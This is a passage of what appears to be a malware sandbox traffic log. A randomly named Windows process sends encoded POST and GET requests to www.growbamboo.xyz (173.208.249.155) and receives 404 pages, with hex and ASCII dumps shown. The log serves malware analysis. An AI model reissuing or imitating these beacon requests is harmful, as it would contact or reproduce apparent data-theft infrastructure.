29 76 07 3d df 5e d8 65 97 e5 0b 1e 3d ab ad cc 39 0d fe 7e 59 da 77 fb e6 01 ee dc 7b 66 12 c6 a7 87 01 55 80 63 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 6e 2b c3 b3 fb 30 40 89 bc 7b 3f 19 87 a9 7b [TRUNCATED] Data Ascii: 1352:r\v N%)[+ <vhC !T+ZSyF,Wnc'v9~{'vUgc.[`E:l,N{7{OwUp/;0'>c{/PuyXL&t<+emT6_:_aVOoBL:ugV)v=^e=9~Yw{fUc7n/L-B/?n+0@{?{T`+1J`,(?{~61y?f<1?LwK,Hyl^XqfG}=2]<s7(r-7Jtn}+siog_m/+K \|g_hwe~^U3\av]]]QJ-riR>`n@f<Zz*6)zunziosWTbd~B+7)o\|$o<?Qky@c+,ygJ'eC/{0.-z'WD3W kJev]~>m?Z+5"&7\_G6l[Z^\|>/VzOAVWeByC+v7z]Qp8OHC7xn^.\|XoO}ek>/bT6+{HbTso{D@W JQxczudtj~S#[[u.g\| NKHZ/W9S%71uBs8Gd[g%B= [TRUNCATED]
Jan 11, 2025 00:08:35.547079086 CET	1236	IN	Data Raw: 9f ed db 55 7c ba 68 f6 b3 5d bf 5f f7 86 7e bf e3 16 b5 0f a3 48 bf f0 bb 55 fc e8 e5 6f 20 5e 3c e9 07 97 a2 1e ca 0b 97 26 b7 f7 82 1b 10 bf 6e e5 57 40 df 5b 7a 3f d1 b7 6b ad fd d1 e2 7e fd dc 07 2f 2c 80 bb b4 83 30 76 3e 92 5f 8f 72 7f 5d Data Ascii: U\|h]_~HUo ^<&nW@[z?k~/,0v>_r]){>=h]RoOg>{{01dW7z,~qVuq\Go^IBn\3/n.?9fe>\_,tGpC/~F
Jan 11, 2025 00:08:35.547095060 CET	448	IN	Data Raw: b8 e3 31 96 a0 d5 3e d6 69 2e 98 8b 93 68 94 d6 0b 8e b4 ce f3 cd 8a 63 38 c1 65 f6 ab 53 59 20 c4 71 c6 a7 6b 60 9a dd 2c 53 db 64 6c 29 81 3a b6 cf e6 90 63 78 95 cf fd d1 3a 3d 9c 93 2d 6d e9 e3 8a eb a2 60 d3 e2 a3 d3 19 17 98 04 39 72 0d b7 Data Ascii: 1>i.hc8eSY qk`,Sdl):cx:=-m`9r05Rt:cMV3+FID\|P+!5@KkR&rkpm}T.hQTc5R8z2-+1\1S.{MiU@R4+ibi_a
Jan 11, 2025 00:08:35.547107935 CET	1236	IN	Data Raw: 18 e5 24 49 fe 2c 87 50 58 34 bb 23 4f 69 e7 62 0a aa 00 81 ae 41 52 c3 29 ab 0e 1a 25 70 ce 74 5c 88 1b e3 9c 20 87 dc 8a da 24 75 ec 34 e7 d5 7a de 62 de 51 58 f1 d2 30 a0 b7 a8 a8 8b 88 07 2f 9c a5 5c 71 3a f0 6f cc 64 78 98 43 9a 4f a8 f4 a6 Data Ascii: $I,PX4#OibAR)%pt\ $u4zbQX0/\q:odxCOU3R>{LSm'`C!cNsgrj7=Uq!."lnx9(Y\|hJgc9r .L+F$j<B7Dj,*z;Ztc\|,6A(
Jan 11, 2025 00:08:35.547126055 CET	999	IN	Data Raw: 16 e9 23 6a 36 d1 87 53 3e dd 89 6d 3b 4c 04 28 5a 70 41 27 a2 76 8c 21 2a c3 33 6b 1f 18 17 8c 43 53 2c d6 76 bb ea bc 03 b4 29 eb 75 35 e1 55 6a 04 98 08 a3 0e 37 a4 d2 09 af 09 c3 6c 98 b4 a2 3f 17 9a 80 a1 c3 e1 61 84 d0 80 bf 99 0b 71 73 4e Data Ascii: #j6S>m;L(ZpA'v!*3kCS,v)u5Uj7l?aqsN)TY^0?um(\|bm\GLBnNVZ'$M)LRH:P&`[#!5SLeht&=.&RPsQ8^P.DNQ`gOv&B3-9UlI\|VWNSC
Jan 11, 2025 00:08:35.547276020 CET	20	IN	Data Raw: 61 0d 0a 03 00 e2 58 a7 12 7e 27 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aX~'0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50011	173.208.249.155	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:37.555145025 CET	777	OUT	POST /e948/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.growbamboo.xyz Origin: http://www.growbamboo.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 235 Cache-Control: max-age=0 Referer: http://www.growbamboo.xyz/e948/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 44 4b 56 69 6d 4f 61 6e 57 79 57 45 47 55 59 54 36 53 48 78 51 69 59 49 68 51 49 5a 4d 76 6d 31 52 65 4b 75 4a 74 6b 30 6b 4e 2b 65 50 6b 4c 4b 56 6c 42 66 5a 51 56 6d 71 75 52 39 39 64 2b 64 4a 61 77 48 62 38 38 45 5a 6f 45 76 58 4e 64 34 45 73 4d 42 77 69 79 6d 75 50 43 6d 37 6f 44 59 57 42 63 56 30 6d 48 67 64 77 72 6d 49 33 33 5a 72 6e 7a 6f 45 42 52 4d 63 35 37 79 44 4d 4d 43 69 65 30 6b 54 71 56 48 52 79 58 2f 6d 4c 6a 30 68 4b 69 68 71 41 2f 78 65 63 52 5a 78 4d 46 7a 42 62 67 4d 72 33 57 7a 6c 54 51 63 59 6e 7a 76 7a 37 75 34 4d 32 54 49 6a 58 77 4b 34 70 50 50 38 74 68 53 76 71 44 2b 64 52 6d 49 68 48 66 4e 35 46 74 77 76 4c 73 4e 4e 2b 34 39 35 42 64 2b 79 67 3d 3d Data Ascii: kPJ4bZ=DKVimOanWyWEGUYT6SHxQiYIhQIZMvm1ReKuJtk0kN+ePkLKVlBfZQVmquR99d+dJawHb88EZoEvXNd4EsMBwiymuPCm7oDYWBcV0mHgdwrmI33ZrnzoEBRMc57yDMMCie0kTqVHRyX/mLj0hKihqA/xecRZxMFzBbgMr3WzlTQcYnzvz7u4M2TIjXwK4pPP8thSvqD+dRmIhHfN5FtwvLsNN+495Bd+yg==
Jan 11, 2025 00:08:38.068587065 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 10 Jan 2025 23:08:37 GMT server: LiteSpeed Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5c 76 ff bf a7 20 4e 25 99 29 b5 5b 2b 20 3c 76 cf 68 43 12 20 21 09 04 88 54 ea 2b ed 12 5a d1 0e 53 79 a0 bc 46 9e 2c 57 d8 6e 63 da fe ba 27 95 1f b9 fe 81 ee 76 ee d9 cf f5 39 f7 b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 67 00 da 63 e0 9a ce b7 df 2e 9f 89 5b 99 60 45 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f 7b 4f 77 95 db 55 70 0f e2 2f 03 3b 30 8b d2 ad 9e ea ca bb 27 ef 3e 85 63 da 81 7b df ef 2f b2 f8 0a 50 9a dd db fd d4 a7 1b 95 c2 f4 13 f3 1f d9 c1 75 79 58 b8 e5 d5 16 e4 1d f4 d4 4c dc a7 bb 26 74 db 3c 2b aa ab 65 6d e8 54 c1 93 e3 36 a1 ed de 5f 3a 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c1 67 56 96 d5 29 76 07 3d df 5e d8 65 97 e5 0b 1e 3d ab ad cc 39 0d fe 7e 59 da 77 fb e6 01 ee dc 7b 66 12 c6 a7 87 01 55 80 63 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 6e 2b c3 b3 fb 30 40 89 bc 7b 3f 19 87 a9 7b [TRUNCATED] Data Ascii: 1352:r\v N%)[+ <vhC !T+ZSyF,Wnc'v9~{'vUgc.[`E:l,N{7{OwUp/;0'>c{/PuyXL&t<+emT6_:_aVOoBL:ugV)v=^e=9~Yw{fUc7n/L-B/?n+0@{?{T`+1J`,(?{~61y?f<1?LwK,Hyl^XqfG}=2]<s7(r-7Jtn}+siog_m/+K \|g_hwe~^U3\av]]]QJ-riR>`n@f<Zz*6)zunziosWTbd~B+7)o\|$o<?Qky@c+,ygJ'eC/{0.-z'WD3W kJev]~>m?Z+5"&7\_G6l[Z^\|>/VzOAVWeByC+v7z]Qp8OHC7xn^.\|XoO}ek>/bT6+{HbTso{D@W JQxczudtj~S#[[u.g\| NKHZ/W9S%71uBs8Gd[g%B= [TRUNCATED]
Jan 11, 2025 00:08:38.068643093 CET	224	IN	Data Raw: 9f ed db 55 7c ba 68 f6 b3 5d bf 5f f7 86 7e bf e3 16 b5 0f a3 48 bf f0 bb 55 fc e8 e5 6f 20 5e 3c e9 07 97 a2 1e ca 0b 97 26 b7 f7 82 1b 10 bf 6e e5 57 40 df 5b 7a 3f d1 b7 6b ad fd d1 e2 7e fd dc 07 2f 2c 80 bb b4 83 30 76 3e 92 5f 8f 72 7f 5d Data Ascii: U\|h]_~HUo ^<&nW@[z?k~/,0v>_r]){>=h]RoOg>{{01dW7z,~qVuq\Go^IBn\3/n.?9fe>\
Jan 11, 2025 00:08:38.068675995 CET	1236	IN	Data Raw: a7 fe 5f 2c b3 74 47 c4 97 70 43 2f b5 16 99 f3 7e 46 81 26 af f4 80 d3 7d f0 a5 f4 5d f6 c8 50 12 f8 65 8a ee 10 38 fd 48 85 d2 d2 86 d3 fb 4f d0 58 f8 ff 71 1b 42 5e fa 33 f4 46 50 53 fc 6c cd cb 3c 14 0e 5d 67 dd 53 ad ec b4 d5 3a 06 7c 51 39 Data Ascii: _,tGpC/~F&}]Pe8HOXqB^3FPSl<]gS:\|Q9j)"fBlGi\ Std]+0cdv*+R/T+\|Cv>:3.%T]\|KRUFB@l+n}6z3bU.gtTF,i"5Qs4^vpM8d
Jan 11, 2025 00:08:38.068710089 CET	1236	IN	Data Raw: 2b d7 a6 94 69 62 c6 98 fb c4 c7 69 d5 5f 1c 0b 61 c3 d0 35 7e 0c b6 00 2f 6a 19 b4 f9 10 53 45 ca 53 23 aa cd 58 61 7e f6 64 ce b0 23 62 af e4 c3 63 30 64 72 62 33 0d 17 e4 56 82 99 98 5c 4d 89 dc af 82 a6 12 12 e2 a8 ea 62 a8 3a 06 34 94 25 af Data Ascii: +ibi_a5~/jSES#Xa~d#bc0drb3V\Mb:4%1T#.eq!E;sU.yi7E,jZ4K-(T~t'{hf5Hi-m8kNRHUB.=M$P6!)&Co.B,T5"vQ[t9V$I,PX4#Oib
Jan 11, 2025 00:08:38.068746090 CET	448	IN	Data Raw: 7f 16 e3 c2 d4 c8 26 6a 47 c7 74 97 d4 ec 6a 4a 6a fe 8a ac 02 c8 81 f2 c0 0e c9 e9 cc 43 bd d6 cc 43 82 28 a6 b9 77 5c ef a9 74 0b cd a6 1a 8f 47 de 84 d8 03 83 3a 3a 1a 0a e2 82 08 3b 36 4c 8f 64 58 9a 6c cb 90 62 97 08 42 e1 aa 8e 04 59 b0 1b Data Ascii: &jGtjJjCC(w\tG::;6LdXlbBYjke@F]nC"l2M ~-!$aZwEn4N+!(5<(!h8n\|ObR/s+f\yvn6FM#j6S>m;L(ZpA
Jan 11, 2025 00:08:38.069361925 CET	795	IN	Data Raw: fb 83 0f b7 b5 49 1a 7c 8c ef 1a 56 57 4e b0 0d 53 8d 43 c0 81 cc ae 8e ae af f6 ff 65 d2 33 4d 1f 72 45 34 f3 7d ff e9 e9 cf 9f 65 10 fa dc c4 a7 85 cb 7e f2 35 93 f9 93 1c dd e7 15 c4 1e c8 55 f2 69 f2 2e 03 df 4f be 25 31 fa de d7 9f a5 46 ae Data Ascii: I\|VWNSCe3MrE4}e~5Ui.O%1F`?T`==-B_!O}tf`fY>}X^/k@=T^+,}^_/='?n~{{\|~y%i%UhTAXAilWPA'V}N+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50012	173.208.249.155	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:40.102344036 CET	1790	OUT	POST /e948/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.growbamboo.xyz Origin: http://www.growbamboo.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1247 Cache-Control: max-age=0 Referer: http://www.growbamboo.xyz/e948/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 44 4b 56 69 6d 4f 61 6e 57 79 57 45 47 55 59 54 36 53 48 78 51 69 59 49 68 51 49 5a 4d 76 6d 31 52 65 4b 75 4a 74 6b 30 6b 4e 32 65 4f 57 44 4b 61 69 74 66 59 51 56 6d 6a 4f 52 67 39 64 2b 45 4a 61 34 44 62 39 41 2b 5a 71 38 76 57 6f 52 34 52 6f 59 42 35 69 79 6d 6c 76 43 6e 2f 6f 44 42 57 48 38 52 30 6c 76 67 64 77 72 6d 49 31 66 5a 76 7a 6e 6f 43 42 52 50 4b 4a 37 75 53 63 4d 6d 69 64 45 30 54 72 68 35 53 42 66 2f 6d 76 50 30 74 59 61 68 31 77 2f 7a 66 63 52 6f 78 4d 42 67 42 66 42 31 72 30 4b 4e 6c 55 77 63 61 67 43 4b 32 49 4b 45 64 33 54 54 30 30 63 66 32 65 33 75 32 75 78 79 6f 73 48 32 61 45 44 6e 34 69 76 48 34 47 34 63 6c 4a 4a 74 53 75 64 4e 35 53 64 31 69 73 79 6f 30 62 57 41 74 78 68 46 62 52 46 37 32 77 32 59 36 63 55 55 2b 5a 75 58 54 57 74 4a 48 68 57 45 69 4e 77 36 72 6b 2b 41 31 45 44 55 64 43 4d 56 31 54 70 51 78 78 69 74 4a 44 51 4f 62 34 2f 63 52 38 43 35 78 61 76 67 34 6f 39 79 78 7a 30 2f 64 45 68 6d 4c 38 76 66 34 61 38 2f 35 4f 69 76 79 71 58 49 38 35 72 [TRUNCATED] Data Ascii: kPJ4bZ=DKVimOanWyWEGUYT6SHxQiYIhQIZMvm1ReKuJtk0kN2eOWDKaitfYQVmjORg9d+EJa4Db9A+Zq8vWoR4RoYB5iymlvCn/oDBWH8R0lvgdwrmI1fZvznoCBRPKJ7uScMmidE0Trh5SBf/mvP0tYah1w/zfcRoxMBgBfB1r0KNlUwcagCK2IKEd3TT00cf2e3u2uxyosH2aEDn4ivH4G4clJJtSudN5Sd1isyo0bWAtxhFbRF72w2Y6cUU+ZuXTWtJHhWEiNw6rk+A1EDUdCMV1TpQxxitJDQOb4/cR8C5xavg4o9yxz0/dEhmL8vf4a8/5OivyqXI85r73w1K1vSWJOlanywIeCtwA4vActLde4UJR1tL1EIeT7GFEFlN/zX3vKvuywVD/Yy1CVnd/OJhr1zKrsbuODocG2j03735d/q7RFfNpPyIAvoo0Y1juRAhqpAI2VgfrwGzYXfFc2HuMEilDc/nE2Qu1ttY1tA4VCsjX8IGCJAgdgwtHRMG4H0ZPNGbxoJPmjz3L8BjzlS4BMcUZF9SreiyrWuZr2hORLnqezeJKPM0LKIYkcOhB1C0ak3c+rTT1yE9zezw+1+4DPrA+AheWW7Q0i9qalk4WZvG8b1TlKvbffGPMyjOb1enVw2vcqtKYUFOdX2WlGkyA3nWyu5cjtsbVo5oMzdn2IkqUoinTb791CargIEROsnFINl/CRnbo57bDT8KY1/Sau8g4DPPV2os/QSNyzrcXHRUUFqghNdveodxQQi1az01+D2IZXvL3NZNHO0d4aq2mmuBCrAVpJuu7kCMkIKxnkvOn/YQj92qLkJUmceJJXAlpDMcJVN3x7fRz2xc1skTvlQA7wrf+m4wB4f+HBOw7ryjT7E1VPQzVH8VfCyKRq9xrkYrnK//VV1QpuRFQNNwSzznppw8xoEE6gbRFSuYvpRhARjAE1lRNuCs197Q74WspxnIUQBprdeylZ4Ja+Z5Wyxc2xVjwvV2MoIxwDuHkEyZ3 [TRUNCATED]
Jan 11, 2025 00:08:40.622778893 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Fri, 10 Jan 2025 23:08:40 GMT server: LiteSpeed Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5c 76 ff bf a7 20 4e 25 99 29 b5 5b 2b 20 3c 76 cf 68 43 12 20 21 09 04 88 54 ea 2b ed 12 5a d1 0e 53 79 a0 bc 46 9e 2c 57 d8 6e 63 da fe ba 27 95 1f b9 fe 81 ee 76 ee d9 cf f5 39 f7 b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 67 00 da 63 e0 9a ce b7 df 2e 9f 89 5b 99 60 45 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f 7b 4f 77 95 db 55 70 0f e2 2f 03 3b 30 8b d2 ad 9e ea ca bb 27 ef 3e 85 63 da 81 7b df ef 2f b2 f8 0a 50 9a dd db fd d4 a7 1b 95 c2 f4 13 f3 1f d9 c1 75 79 58 b8 e5 d5 16 e4 1d f4 d4 4c dc a7 bb 26 74 db 3c 2b aa ab 65 6d e8 54 c1 93 e3 36 a1 ed de 5f 3a 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c1 67 56 96 d5 29 76 07 3d df 5e d8 65 97 e5 0b 1e 3d ab ad cc 39 0d fe 7e 59 da 77 fb e6 01 ee dc 7b 66 12 c6 a7 87 01 55 80 63 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 6e 2b c3 b3 fb 30 40 89 bc 7b 3f 19 87 a9 7b [TRUNCATED] Data Ascii: 1352:r\v N%)[+ <vhC !T+ZSyF,Wnc'v9~{'vUgc.[`E:l,N{7{OwUp/;0'>c{/PuyXL&t<+emT6_:_aVOoBL:ugV)v=^e=9~Yw{fUc7n/L-B/?n+0@{?{T`+1J`,(?{~61y?f<1?LwK,Hyl^XqfG}=2]<s7(r-7Jtn}+siog_m/+K \|g_hwe~^U3\av]]]QJ-riR>`n@f<Zz*6)zunziosWTbd~B+7)o\|$o<?Qky@c+,ygJ'eC/{0.-z'WD3W kJev]~>m?Z+5"&7\_G6l[Z^\|>/VzOAVWeByC+v7z]Qp8OHC7xn^.\|XoO}ek>/bT6+{HbTso{D@W JQxczudtj~S#[[u.g\| NKHZ/W9S%71uBs8Gd[g%B= [TRUNCATED]
Jan 11, 2025 00:08:40.622827053 CET	1236	IN	Data Raw: 9f ed db 55 7c ba 68 f6 b3 5d bf 5f f7 86 7e bf e3 16 b5 0f a3 48 bf f0 bb 55 fc e8 e5 6f 20 5e 3c e9 07 97 a2 1e ca 0b 97 26 b7 f7 82 1b 10 bf 6e e5 57 40 df 5b 7a 3f d1 b7 6b ad fd d1 e2 7e fd dc 07 2f 2c 80 bb b4 83 30 76 3e 92 5f 8f 72 7f 5d Data Ascii: U\|h]_~HUo ^<&nW@[z?k~/,0v>_r]){>=h]RoOg>{{01dW7z,~qVuq\Go^IBn\3/n.?9fe>\_,tGpC/~F
Jan 11, 2025 00:08:40.622865915 CET	1236	IN	Data Raw: b8 e3 31 96 a0 d5 3e d6 69 2e 98 8b 93 68 94 d6 0b 8e b4 ce f3 cd 8a 63 38 c1 65 f6 ab 53 59 20 c4 71 c6 a7 6b 60 9a dd 2c 53 db 64 6c 29 81 3a b6 cf e6 90 63 78 95 cf fd d1 3a 3d 9c 93 2d 6d e9 e3 8a eb a2 60 d3 e2 a3 d3 19 17 98 04 39 72 0d b7 Data Ascii: 1>i.hc8eSY qk`,Sdl):cx:=-m`9r05Rt:cMV3+FID\|P+!5@KkR&rkpm}T.hQTc5R8z2-+1\1S.{MiU@R4+ibi_a
Jan 11, 2025 00:08:40.622900963 CET	1236	IN	Data Raw: 0a 5c b3 3c aa 88 a5 bb ed d4 ae 8e 52 bf 9e a1 2b 92 a0 34 8d d0 5a ea 58 25 26 33 dd a7 5a b8 c0 62 4b 82 04 93 62 86 69 7e 84 c4 76 0a 8d 82 c0 a3 b7 67 59 8e b7 a3 23 53 f0 3b ed 74 36 91 93 bc 74 50 0e f5 4a 43 67 c6 fa 06 9b 65 f9 78 77 da Data Ascii: \<R+4ZX%&3ZbKbi~vgY#S;t6tPJCgexwYe;A.<lz8~D24wh*[fgB9MW^wBy@NSL6)^lg4-tL)$H%4ruYsshA1xuZB+&jGtjJj
Jan 11, 2025 00:08:40.622939110 CET	211	IN	Data Raw: 48 2e 37 9a f4 01 5e 57 2e e1 15 c5 c7 e7 52 de 7b 4e ff b2 5a bd 9a 78 ff 82 eb 01 06 3c 34 53 37 06 c1 23 81 ff 5a 57 c9 ef 65 56 17 b6 fb f4 3c dc 06 c9 bf f6 83 7d 4d ac 4e c0 60 9c f9 d9 65 a4 f7 40 c0 82 9f fa 01 50 8b 8e 9e 07 cd 24 37 41 Data Ascii: H.7^W.R{NZx<4S7#ZWeV<}MN`e@P$7AFFW^_w AJ_?gwe4?gZg/o5D,6F #/?
Jan 11, 2025 00:08:40.623091936 CET	20	IN	Data Raw: 61 0d 0a 03 00 04 44 6f a0 7e 27 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aDo~'0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50013	173.208.249.155	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:42.647763014 CET	498	OUT	GET /e948/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=OI9Cl4brfnKnEU4iz0SiaxRa9h1FDMDvQ4DRdccrsueMHwTXZC0uGTlQqvZMtZjxNZZWYO9eSaARepBsGdBKuQ+lt96Nu4y5aB841AjeaGyZFFzppkHuNwNXfZrWKvYHi/gwd9U= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.growbamboo.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Jan 11, 2025 00:08:43.185142994 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html transfer-encoding: chunked date: Fri, 10 Jan 2025 23:08:43 GMT server: LiteSpeed Data Raw: 32 37 37 65 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 277e<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Jan 11, 2025 00:08:43.185158968 CET	224	IN	Data Raw: 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 Data Ascii: display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A;
Jan 11, 2025 00:08:43.185170889 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c Data Ascii: color: #FFFFFF; } .additional-info a { color: #FFFFFF; } .additional-info-items { padding: 20px 0; min-height: 193px; } .contact-info {
Jan 11, 2025 00:08:43.185184002 CET	1236	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f Data Ascii: { text-align: center; margin: 60px 0; } footer a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px;
Jan 11, 2025 00:08:43.185197115 CET	1236	IN	Data Raw: 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 Data Ascii: solute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .a
Jan 11, 2025 00:08:43.185210943 CET	672	IN	Data Raw: 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 41 61 4d 2b 79 51 75 6e 42 6d 4e 53 77 62 52 56 59 68 2b 6b 4f 63 67 4d 68 76 52 44 42 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e Data Ascii: /n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k
